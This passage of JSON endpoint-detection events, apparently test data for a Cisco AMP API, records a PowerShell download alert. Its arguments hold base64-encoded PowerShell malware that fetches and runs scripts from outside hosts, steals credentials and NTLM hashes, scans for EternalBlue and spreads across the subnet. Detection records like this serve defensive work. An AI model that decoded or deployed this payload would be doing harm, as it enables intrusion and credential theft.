zAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbA